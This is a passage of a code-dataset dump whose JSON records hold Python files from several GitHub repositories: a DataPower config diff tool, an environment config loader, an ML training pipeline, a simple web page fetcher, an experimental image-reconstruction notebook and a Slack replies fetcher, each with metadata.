tree.remove(node)\n for node in tree.xpath(\"/datapower-configuration/interface-data\"):\n tree.remove(node)\n for node in tree.xpath(\"/datapower-configuration/files\"):\n tree.remove(node)\n for node in tree.xpath(\".//*\"):\n if \"intrinsic\" in node.attrib:\n del node.attrib[\"intrinsic\"]\n if \"read-only\" in node.attrib:\n del node.attrib[\"read-only\"]\n\ndef get_obj_path(node):\n return '/{}/{}[@name=\"{}\"]'.format(\n \"/\".join(\n anc.tag for anc in reversed(list(node.iterancestors()))\n ),\n node.tag,\n node.get(\"name\")\n )\n\nHTML_TABLE = \"\"\"\n\n \n \n \n \n {}\n \n\n\"\"\"\nTABLE_ROW = \"\"\"\n \n {}\n
\n\"\"\"\n\ndef main(\n xcfg_globs=[],\n out_dir=\"tmp\",\n wrapcolumn=80,\n tabsize=4,\n no_only_differences=False,\n no_remove_namespaces=False,\n ):\n only_differences = not no_only_differences\n remove_namespaces = not no_remove_namespaces\n if not os.path.exists(out_dir):\n os.makedirs(out_dir)\n parser = etree.XMLParser(\n remove_blank_text=True,\n strip_cdata=False,\n )\n differ = difflib.HtmlDiff(wrapcolumn=wrapcolumn, tabsize=tabsize)\n filenames = set()\n # Clean up xml documents\n for pattern in xcfg_globs:\n for filename in glob(pattern):\n filenames.add(os.path.abspath(filename))\n tree = etree.parse(filename, parser).getroot()\n if remove_namespaces:\n tree = REMOVE_NAMESPACES(tree).getroot()\n clean(tree)\n sort_children(tree)\n with open(filename, \"wb\") as fp:\n fp.write(etree.tostring(tree, pretty_print=True))\n # Cast to a list for order\n filenames = list(filenames)\n # sort by basename\n common_prefix = os.path.dirname(os.path.commonprefix(filenames))\n _filenames = map(\n lambda x: x.replace(common_prefix, \"\"),\n filenames,\n )\n\n # remove leading path seperator\n _filenames = map(\n lambda x: x.lstrip(os.path.sep),\n _filenames,\n )\n\n # Sort by dirname\n _filenames.sort(key=lambda p: p.split(os.path.sep))\n\n # sort by filename\n _filenames.sort(key=os.path.basename)\n\n for filename in _filenames:\n print(\"{} {}\".format(get_sha256(os.path.join(common_prefix, filename)), filename))\n\n for index, (left_filename, right_filename) in enumerate(combinations(filenames, 2)):\n if get_sha256(left_filename) == get_sha256(right_filename):\n continue\n html_rows = []\n left_tree = etree.parse(left_filename, parser)\n left_config = left_tree.getroot().xpath(\"/datapower-configuration/configuration\")[0]\n right_tree = etree.parse(right_filename, parser)\n right_config = right_tree.getroot().xpath(\"/datapower-configuration/configuration\")[0]\n for lchild in left_config.iterchildren():\n lpath = get_obj_path(lchild)\n rchild = right_config.xpath(lpath)\n if not rchild:\n rside = \"{}\\n\".format(\" \"*(wrapcolumn-1)) * len(etree.tostring(lchild, pretty_print=True).splitlines())\n rside = rside.splitlines()\n html_rows.append(\n TABLE_ROW.format(\n differ.make_table(\n etree.tostring(lchild, pretty_print=True).splitlines(),\n rside,\n left_filename,\n right_filename,\n )\n )\n )\n elif len(rchild) > 1:\n raise ValueError(\"ERROR: Path {} was expected to be unique but yielded {} results\".format(lpath, len(rchild)))\n else:\n rchild = rchild[0]\n str_lchild = etree.tostring(lchild, pretty_print=True)\n str_rchild = etree.tostring(rchild, pretty_print=True)\n if only_differences and hashlib.sha256(str_lchild).hexdigest() == hashlib.sha256(str_rchild).hexdigest():\n pass\n else:\n html_rows.append(\n TABLE_ROW.format(\n differ.make_table(\n str_lchild.splitlines(),\n str_rchild.splitlines(),\n left_filename,\n right_filename,\n )\n )\n )\n for rchild in right_config.iterchildren():\n rpath = get_obj_path(rchild)\n lchild = left_config.xpath(rpath)\n if not lchild:\n lside = \"{}\\n\".format(\" \"*(wrapcolumn-1)) * len(etree.tostring(rchild, pretty_print=True).splitlines())\n lside = lside.splitlines()\n html_rows.append(\n TABLE_ROW.format(\n differ.make_table(\n lside,\n etree.tostring(rchild, pretty_print=True).splitlines(),\n left_filename,\n right_filename,\n )\n )\n )\n diff_filename = \"{}-{}-vs-{}-{}.html\".format(\n index,\n \"_\".join(list(OrderedDict.fromkeys([x for x in left_filename.split(os.path.sep) if x not in right_filename.split(os.path.sep)]))),\n 
\"_\".join(list(OrderedDict.fromkeys([x for x in right_filename.split(os.path.sep) if x not in left_filename.split(os.path.sep)]))),\n os.path.basename(left_filename),\n )\n diff_filename = os.path.join(\n out_dir,\n diff_filename,\n )\n with open(diff_filename, \"wb\") as fp:\n fp.write(\n HTML_TABLE.format(\"\".join(html_rows))\n )\n\n\nif __name__ == \"__main__\":\n cli = Cli(main=main)\n try:\n cli.run()\n except SystemExit:\n pass\n except:\n make_logger(\"error\").exception(\"an unhandled exception occurred.\")\n raise\n", "repo_name": "McIndi/mast.installer", "sub_path": "mast/installer/files/contrib/xcfgdiff.py", "file_name": "xcfgdiff.py", "file_ext": "py", "file_size_in_byte": 8377, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "lxml.etree.parse", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 36, "usage_type": "name"}, {"api_name": "io.BytesIO", "line_number": 36, "usage_type": "call"}, {"api_name": "lxml.etree.XSLT", "line_number": 37, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 37, "usage_type": "name"}, {"api_name": "itertools.groupby", "line_number": 42, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 48, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 112, "usage_type": "call"}, {"api_name": "lxml.etree.XMLParser", "line_number": 113, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 113, "usage_type": "name"}, {"api_name": "difflib.HtmlDiff", "line_number": 117, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 121, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 122, "usage_type": "call"}, {"api_name": "os.path", "line_number": 122, "usage_type": "attribute"}, {"api_name": "lxml.etree.parse", "line_number": 123, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 123, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 129, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 129, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 133, "usage_type": "attribute"}, {"api_name": "os.path.commonprefix", "line_number": 133, "usage_type": "call"}, {"api_name": "os.path", "line_number": 141, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 146, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "mast.hashes.get_sha256", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "itertools.combinations", "line_number": 154, "usage_type": "call"}, {"api_name": "mast.hashes.get_sha256", "line_number": 155, "usage_type": "call"}, {"api_name": "lxml.etree.parse", "line_number": 158, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 158, "usage_type": "name"}, {"api_name": "lxml.etree.parse", "line_number": 160, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 160, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 166, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 166, "usage_type": 
"name"}, {"api_name": "lxml.etree.tostring", "line_number": 171, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 171, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 182, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 182, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 183, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 183, "usage_type": "name"}, {"api_name": "hashlib.sha256", "line_number": 184, "usage_type": "call"}, {"api_name": "lxml.etree.tostring", "line_number": 201, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 201, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 207, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 207, "usage_type": "name"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 215, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 215, "usage_type": "name"}, {"api_name": "os.path", "line_number": 215, "usage_type": "attribute"}, {"api_name": "collections.OrderedDict.fromkeys", "line_number": 216, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 216, "usage_type": "name"}, {"api_name": "os.path", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 217, "usage_type": "call"}, {"api_name": "os.path", "line_number": 217, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 219, "usage_type": "call"}, {"api_name": "os.path", "line_number": 219, "usage_type": "attribute"}, {"api_name": "mast.cli.Cli", "line_number": 230, "usage_type": "call"}, {"api_name": "mast.logging.make_logger", "line_number": 236, "usage_type": "call"}]}
+{"seq_id": "30106085853", "text": "import os\nfrom dotenv import load_dotenv\nimport pathlib\n\n\nclass Configuration:\n SHARED_FILE = \".env.shared\"\n SECRET_FILE = \".env.secret\"\n\n PORT_ENV = \"PORT\"\n LOGS_PATH_ENV = \"LOGS_PATH\"\n AUTH_SECRET_ENV = \"AUTH_SECRET\"\n DOCKER_SOCKET_ENV = \"DOCKER_SOCKET\"\n\n def __init__(self):\n shared_file_full_path = os.path.join(pathlib.Path(__file__).parent.parent.resolve(), Configuration.SHARED_FILE)\n secret_file_full_path = os.path.join(pathlib.Path(__file__).parent.parent.resolve(), Configuration.SECRET_FILE)\n\n if not load_dotenv(shared_file_full_path):\n raise EnvironmentError(\"Missed or empty '%s' file\" % shared_file_full_path)\n if not load_dotenv(secret_file_full_path):\n raise EnvironmentError(\"Missed or empty '%s' file\" % secret_file_full_path)\n\n self.server_port: int = int(os.getenv(Configuration.PORT_ENV, None))\n self.logs_path: str = os.getenv(Configuration.LOGS_PATH_ENV, None)\n self.auth_secret: str = os.getenv(Configuration.AUTH_SECRET_ENV, None)\n self.docker_socket: str = os.getenv(Configuration.DOCKER_SOCKET_ENV, None)\n\n if self.server_port is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.PORT_ENV)\n\n if self.logs_path is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.LOGS_PATH_ENV)\n else:\n # add trailing slash if it's not already set\n self.logs_path = os.path.join(self.logs_path, \"\")\n\n if self.auth_secret is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.AUTH_SECRET_ENV)\n\n if self.docker_socket is None:\n raise EnvironmentError(\"Missed '%s' environment variable\" % Configuration.DOCKER_SOCKET_ENV)\n", "repo_name": "neokaidan/neokaidan-deploy-server", "sub_path": "server/config.py", "file_name": "config.py", "file_ext": "py", "file_size_in_byte": 1823, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.join", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 17, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 19, "usage_type": "call"}, {"api_name": "dotenv.load_dotenv", "line_number": 21, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 24, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 25, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 26, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 36, "usage_type": "call"}, {"api_name": "os.path", "line_number": 36, "usage_type": "attribute"}]}
+{"seq_id": "19303371335", "text": "import sys,os\nsys.path.append(os.getcwd())\nimport joblib\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import GridSearchCV\nimport src.features.feature_pipe as features\nimport src.models.ml_models as ml_models\nfrom src.visualization import explainability, model_evaluation\n\ndef train_save_model(df, target, model_name, train_name='', model_type='regression'):\n\n X, y = df.drop(columns=target), df[target]\n\n feature_pipe, feature_grid = features.features_pipeline()\n\n model, ml_grid = ml_models.get_model(model_name)\n\n pipeline = feature_pipe\n pipeline.extend([(\"model\", model)])\n pipe_grid = {}\n pipe_grid.update(feature_grid)\n pipe_grid.update(ml_grid)\n #boruta_selector = BorutaPy(model_, n_estimators='auto', verbose=2, random_state=1)\n pipeline = Pipeline(pipeline)\n cv_result = GridSearchCV(pipeline, feature_grid, cv=5)\n cv_result.fit(X, y)\n\n explainability.feature_importance(model=model_name, cv_result=cv_result,\n train_name=train_name)\n predict = cv_result.predict(X)\n model_evaluation.evaluate_model(model_type=model_type, y_true=y,\n y_pred=predict, train_model=train_name)\n \n model_evaluation.evaluate_kpis(y_true=y, y_pred=predict, model=train_name,\n save=True)\n\n # Save Model\n joblib.dump(cv_result, f'models\\pickle\\model_{train_name}.pickle')", "repo_name": "jubiss/association_rules", "sub_path": "src/models/train_model.py", "file_name": "train_model.py", "file_ext": "py", "file_size_in_byte": 1440, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.append", "line_number": 2, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 2, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 2, "usage_type": "call"}, {"api_name": "src.features.feature_pipe.features_pipeline", "line_number": 14, "usage_type": "call"}, {"api_name": "src.features.feature_pipe", "line_number": 14, "usage_type": "name"}, {"api_name": "src.models.ml_models.get_model", "line_number": 16, "usage_type": "call"}, {"api_name": "src.models.ml_models", "line_number": 16, "usage_type": "name"}, {"api_name": "sklearn.pipeline.Pipeline", "line_number": 24, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 25, "usage_type": "call"}, {"api_name": "src.visualization.explainability.feature_importance", "line_number": 28, "usage_type": "call"}, {"api_name": "src.visualization.explainability", "line_number": 28, "usage_type": "name"}, {"api_name": "src.visualization.model_evaluation.evaluate_model", "line_number": 31, "usage_type": "call"}, {"api_name": "src.visualization.model_evaluation", "line_number": 31, "usage_type": "name"}, {"api_name": "src.visualization.model_evaluation.evaluate_kpis", "line_number": 34, "usage_type": "call"}, {"api_name": "src.visualization.model_evaluation", "line_number": 34, "usage_type": "name"}, {"api_name": "joblib.dump", "line_number": 38, "usage_type": "call"}]}
+{"seq_id": "11363287683", "text": "#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n\n\"\"\"\n@author: Zhangll\n@software: PyCharm Community Edition\n@time: 2016/9/27 23:04\n\"\"\"\nimport requests\nfrom bs4 import BeautifulSoup\n\ndef test_webpage(url):\n #一般会根据服务器的要求添加识别标记\n headers={'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.113 Safari/537.36'}\n response = requests.get(url,headers=headers)\n soup=BeautifulSoup(response.text,\"lxml\")\n # text=soup.select(\"#article_details > div.article_title > h1 > span > a\")\n\n # print(text)\n print(response.status_code)#403\n print(response.request.headers)#{'Connection': 'keep-alive', 'Accept-Encoding': 'gzip, deflate', 'Accept': '*/*', 'User-Agent': 'python-requests/2.11.1'} python开头\n print(soup.head.title.text)\n\nif __name__=='__main__':\n # test_webpage(\"http://blog.csdn.net/wswzjdez/article/details/5694942\")\n test_webpage(\"http://www.cec.com.cn\")", "repo_name": "a524631266/crawlday03", "sub_path": "add_headers.py", "file_name": "add_headers.py", "file_ext": "py", "file_size_in_byte": 975, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "requests.get", "line_number": 15, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 16, "usage_type": "call"}]}
+{"seq_id": "75091181288", "text": "# To add a new cell, type '# %%'\n# To add a new markdown cell, type '# %% [markdown]'\n# %%\nfrom PIL import Image\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\n\n\n# %%\nim1 = Image.open('/Users/albert/PycharmProjects/test/ImColl/bellucci.jpg')\nim1.save('bel.jpg')\nim = Image.open('bel.jpg')\nim = im.convert('L')\nim.save('belorig.jpg')\npix = np.asarray(im.getdata(), dtype=np.float64).reshape((im.size[1], im.size[0]))\nprint(pix[1][1])\nprint(pix.ndim)\n\n\n# %%\n\n# pix = np.asarray(im.getdata(), dtype=np.float64).reshape((im.size[1], im.size[0]))\n\n\n# %%\nb = 0\nwhile b < 256:\n for a in pix[b]:\n if a > 0:\n a -= 1\n b += 1\n\n\n# %%\ndef distance(x1, y1, z1, x2, y2, z2):\n return ((x1 - x2)**2 + (y1 - y2)**2 + (z1 - z2)**2)**(1/2)\n\n\n# %%\nAQQURACY = 10000\n\n\n# %%\n#test\ni = 100\n\nwhile i < 200:\n # pix[142][i] = 255\n # pix[143][i] = 255\n # pix[144][i] = 255\n # pix[145][i] = 255\n # pix[146][i] = 255\n # pix[147][i] = 255\n # pix[148][i] = 255\n # pix[149][i] = 255\n pix[132][i] = 255\n pix[133][i] = 255\n pix[134][i] = 255\n pix[135][i] = 255\n pix[136][i] = 255\n pix[137][i] = 255\n pix[138][i] = 255\n pix[139][i] = 255\n # pix[122][i] = 255\n # pix[123][i] = 255\n # pix[124][i] = 255\n # pix[125][i] = 255\n # pix[126][i] = 255\n # pix[127][i] = 255\n # pix[128][i] = 255\n # pix[129][i] = 255\n # pix[112][i] = 255\n # pix[113][i] = 255\n # pix[114][i] = 255\n # pix[115][i] = 255\n # pix[116][i] = 255\n # pix[117][i] = 255\n # pix[118][i] = 255\n # pix[119][i] = 255\n i += 1\n\n\n# %%\nf_y = np.zeros((256, 256))\nf_x = np.zeros((256, 256))\n\n\n# %%\ni = 1\nj = 1\n\n# Differentiation\n\nwhile i < 255:\n while j < 255:\n if pix[i][j] == 255:\n f_x[i][j] = 255\n f_y[i][j] = 255\n j += 1\n continue\n\n if (pix[i][j+1] != 255) and (pix[i][j-1] != 255):\n f_x[i][j] = (pix[i][j+1] - pix[i][j-1])/2\n elif (pix[i][j+1] == 255) and (pix[i][j-1] != 255):\n f_x[i][j] = pix[i][j] - pix[i][j-1]\n elif (pix[i][j+1] != 255) and (pix[i][j-1] == 255):\n f_x[i][j] = pix[i][j+1] - pix[i][j]\n else:\n f_x[i][j] = 255\n\n\n\n if (pix[i+1][j] != 255) and (pix[i-1][j] != 255):\n f_y[i][j] = (pix[i+1][j] - pix[i-1][j])/2\n elif (pix[i+1][j] == 255) and (pix[i-1][j] != 255):\n f_y[i][j] = pix[i][j] - pix[i-1][j]\n elif (pix[i+1][j] != 255) and (pix[i-1][j] == 255):\n f_y[i][j] = pix[i+1][j] - pix[i][j]\n else:\n f_y[i][j] = 255\n\n j += 1\n\n i += 1\n j = 1\n\n\n# %%\ni = 1\nj = 1\np = np.zeros((256, 256))\n\n# \n\nwhile i < 255:\n while j < 255:\n if f_y[i][j] != 0:\n p[i][j] = float('{:.2f}'.format(- math.atan(f_x[i][j]/f_y[i][j])))\n else:\n p[i][j] = - math.pi/2 #Тут мы доопределяем неопределенность типа 0/0 значением, равным pi/2 (нуждает в уточнении)\n\n if f_y[i][j] == 255:\n p[i][j] = 255\n\n\n\n j += 1\n i += 1\n j = 1\n\n \n\n\n\n\n\n\nnx, ny = 256, 256 \nx = range(nx) \ny = range(ny) \n\nhf = plt.figure() \nha = hf.add_subplot(111, projection='3d') \nX, Y = np.meshgrid(x, y) # `plot_surface` expects `x` and `y` data to be 2D \nha.plot_surface(X, Y, p) \n\n\n# %%\nNewPix = np.zeros((256, 256, 100001))\nccc = 0\ni = 2\nj = 2\n\nwhile i < 255:\n while j < 255:\n if(p[i][j] < 200):\n NewPix[i][j][int((AQQURACY * p[i][j]) + 5*AQQURACY)]\n # while k < 5*AQQURACY:\n # if k == (AQQURACY * p[i][j]):\n \n # NewPix[i][j][k+5*AQQURACY] = pix[i][j] \n \n\n # else:\n # NewPix[i][j][k+5*AQQURACY] = 256\n \n \n # k += 1\n\n j += 1\n # k = -5*AQQURACY\n \n i += 1\n j = 1\n\n\n\n\n\n\n# %%\nMainSq = 
np.zeros((4,2), dtype=int)\n\nMainSq[0] = [1, 4]\nprint(NewPix[252][105])\n\n\n# %%\n\n# Search for columns\n\ni = 1\nj = 1\ndamaged_pix = 0\n\nwhile i < 255:\n    while j < 255:\n        if pix[i][j] == 255.0:\n            damaged_pix += 1\n        j += 1\n    i += 1\n    j = 1\n\ni = 1\nj = 1\nk = -50\nx = 1\n\npixcopy = pix.copy()\n\nwhile damaged_pix > 0:\n\n    while i < 255:\n        while j < 255:\n            if pix[i][j] == 255.0: # if a damaged pixel was found\n                \n                while i + x < 256: # search downward\n                    if pix[i + x][j] == 255.0:\n                        x += 1\n                    else:\n                        break\n\n                if i + x >= 256:\n                    x -= 1\n\n                MainSq[0] = [i + x, j] \n                x = 1\n\n\n\n\n                while i - x >= 0: # search upward\n                    if pix[i - x][j] == 255.0:\n                        x += 1\n                    else:\n                        break\n\n                if i - x < 0:\n                    x -= 1\n\n                MainSq[1] = [i - x, j]\n                x = 1\n\n                while j + x < 256: # search rightward\n                    if pix[i][j + x] == 255.0:\n                        x += 1\n                    else:\n                        break\n\n                if j + x >= 256:\n                    x -= 1\n\n                MainSq[2] = [i, j + x]\n                x = 1\n\n                while j - x >= 0: # search leftward\n                    if pix[i][j - x] == 255.0:\n                        x += 1\n                    else:\n                        break\n\n                if j - x < 0:\n                    x -= 1\n\n                MainSq[3] = [i, j - x]\n\n                x = 1\n\n                \n\n                a = min(p[MainSq[0][0]][MainSq[0][1]], p[MainSq[1][0]][MainSq[1][1]], p[MainSq[2][0]][MainSq[2][1]], p[MainSq[3][0]][MainSq[3][1]])\n                b = max(p[MainSq[0][0]][MainSq[0][1]], p[MainSq[1][0]][MainSq[1][1]], p[MainSq[2][0]][MainSq[2][1]], p[MainSq[3][0]][MainSq[3][1]])\n                k = a * AQQURACY\n                k = int(k)\n                while k <= b:\n                    dist0 = distance(i, j, k + 5*AQQURACY, MainSq[0][0], MainSq[0][1], (int(p[MainSq[0][0]][MainSq[0][1]] * AQQURACY)))\n                    dist1 = distance(i, j, k + 5*AQQURACY, MainSq[1][0], MainSq[1][1], (int(p[MainSq[1][0]][MainSq[1][1]] * AQQURACY)))\n                    dist2 = distance(i, j, k + 5*AQQURACY, MainSq[2][0], MainSq[2][1], (int(p[MainSq[2][0]][MainSq[2][1]] * AQQURACY)))\n                    dist3 = distance(i, j, k + 5*AQQURACY, MainSq[3][0], MainSq[3][1], (int(p[MainSq[3][0]][MainSq[3][1]] * AQQURACY)))\n\n\n                    NewPix[i][j][k + 5*AQQURACY] = pix[MainSq[0][0]][MainSq[0][1]] * (dist1 + dist2 + dist3) + pix[MainSq[1][0]][MainSq[1][1]] * (dist0 + dist2 + dist3) + pix[MainSq[2][0]][MainSq[2][1]] * (dist1 + dist0 + dist3) + pix[MainSq[3][0]][MainSq[3][1]] * (dist1 + dist2 + dist0)\n\n                    NewPix[i][j][k + 5*AQQURACY] = NewPix[i][j][k + 5*AQQURACY] / (3 * (dist0 + dist1 + dist2 + dist3))\n                    \n\n                    k += 1\n### MUST NOT FORGET TO RESET K HERE, AND GENERALLY THINK THIS THROUGH PROPERLY\n                damaged_pix -= 1\n                pixcopy[i][j] = 255.0\n                for it in NewPix[i][j]:\n                    if ((it < pixcopy[i][j]) and (it > 0)):\n                        pixcopy[i][j] = it\n\n\n                \n            j += 1\n        i += 1\n        j = 1\n        pix = pixcopy.copy()\n        i = 1\n\n\n\n\n\n\n\n    # sum = (left * rstep + right * lstep)/(lstep + rstep) + (up * dstep + down * ustep)/(dstep + ustep)\n\n\n    # Radius = 8\n\n\n    # if ustep * dstep != 0:\n    #     if ustep + dstep < 2*Radius:\n    #         sum1 = ((up * dstep) + (down * ustep)) / (dstep + ustep)\n    #         sum = sum1\n    #     else:\n    #         sum1 = 0\n    # else:\n    #     sum1 = 0\n\n\n    # if lstep * rstep != 0:\n    #     if lstep + rstep < 2*Radius:\n    #         sum2 = ((left * rstep) + (right * lstep)) / (lstep + rstep)\n    #         if (lstep + rstep) < (ustep + dstep):\n    #             sum = sum2\n    #     else: sum2 = 0\n    # else:\n    #     sum2 = 0\n\n\n\n\n    # if (sum1 == 0) | (sum2 == 0):\n    #     k = 1\n    # else:\n    #     k = 2\n    #\n    # pixcopy[i][j] = (sum1+sum2)/k # the main problem is here: 
the sums should also be taken with different weighting coefficients\n\n\n\n    # if sum != 0:\n    #     pixcopy[i][j] = sum\n    #     damaged_pix -= 1\n    # sum1 = 0\n    # sum2 = 0\n    # sum = 0\n    # down = 0\n    # up = 0\n    # left = 0\n    # right = 0\n    \n\n\n# %%\nprint(NewPix[132][130])\n\n\n# %%\nprint(pix[132][130])\n\n\n# %%\npix = np.asarray(pix, dtype=np.uint8)\n\nImRes = Image.fromarray(pix, mode='L')\n\nImRes.save('resbel.jpg')\n\n\n# %%\n\n\n\n", "repo_name": "Deewer25/Image_Reconstration", "sub_path": "lift and recover/lift1.py", "file_name": "lift1.py", "file_ext": "py", "file_size_in_byte": 9286, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PIL.Image.open", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 14, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 14, "usage_type": "name"}, {"api_name": "numpy.asarray", "line_number": 17, "usage_type": "call"}, {"api_name": "numpy.float64", "line_number": 17, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 86, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 87, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 133, "usage_type": "call"}, {"api_name": "math.atan", "line_number": 140, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 142, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 164, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 164, "usage_type": "name"}, {"api_name": "numpy.meshgrid", "line_number": 166, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 204, "usage_type": "call"}, {"api_name": "numpy.asarray", "line_number": 390, "usage_type": "call"}, {"api_name": "numpy.uint8", "line_number": 390, "usage_type": "attribute"}, {"api_name": "PIL.Image.fromarray", "line_number": 392, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 392, "usage_type": "name"}]}
+{"seq_id": "1241587024", "text": "from datasetcreation.config.configuration import ConfigManager\nimport requests\nfrom ensure import ensure_annotations\nfrom datasetcreation.utils.common import get_slack_auth_token\nfrom datasetcreation.pipeline.conversations_stage import ConversationsStage\nfrom datasetcreation import logger\nimport time\n\nSTAGE_NAME = \"Fetch replies\"\n\nclass RepliesStage:\n def __init__(self, config_manager: ConfigManager) -> None:\n self.config_manager = config_manager\n\n @ensure_annotations\n def main(self, conversations_generator):\n auth_token = get_slack_auth_token()\n for channel_id, ts in conversations_generator():\n url = self.config_manager.config.slack.replies_url.replace('{channel_id}', channel_id).replace('{ts}', ts)\n headers = {'Authorization': f'Bearer {auth_token}'}\n try:\n response = requests.get(url, headers=headers)\n yield channel_id, ts, response.json()\n except Exception as e:\n logger.error(f'Error calling {url}, {e}')\n time.sleep(1)\n\nif __name__ == '__main__':\n config_manager = ConfigManager()\n conv_stage = ConversationsStage(config_manager)\n stage = RepliesStage(config_manager)\n for channel, ts, response in stage.main(conv_stage.main):\n logger.info(f'Channel and ts: {channel}, {ts} returns response {response}')", "repo_name": "dimoynwa/sp2t-text-summarizer", "sub_path": "src/datasetcreation/pipeline/replies_stage.py", "file_name": "replies_stage.py", "file_ext": "py", "file_size_in_byte": 1370, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datasetcreation.config.configuration.ConfigManager", "line_number": 12, "usage_type": "name"}, {"api_name": "datasetcreation.utils.common.get_slack_auth_token", "line_number": 17, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 22, "usage_type": "call"}, {"api_name": "datasetcreation.logger.error", "line_number": 25, "usage_type": "call"}, {"api_name": "datasetcreation.logger", "line_number": 25, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 26, "usage_type": "call"}, {"api_name": "ensure.ensure_annotations", "line_number": 15, "usage_type": "name"}, {"api_name": "datasetcreation.config.configuration.ConfigManager", "line_number": 29, "usage_type": "call"}, {"api_name": "datasetcreation.pipeline.conversations_stage.ConversationsStage", "line_number": 30, "usage_type": "call"}, {"api_name": "datasetcreation.logger.info", "line_number": 33, "usage_type": "call"}, {"api_name": "datasetcreation.logger", "line_number": 33, "usage_type": "name"}]}
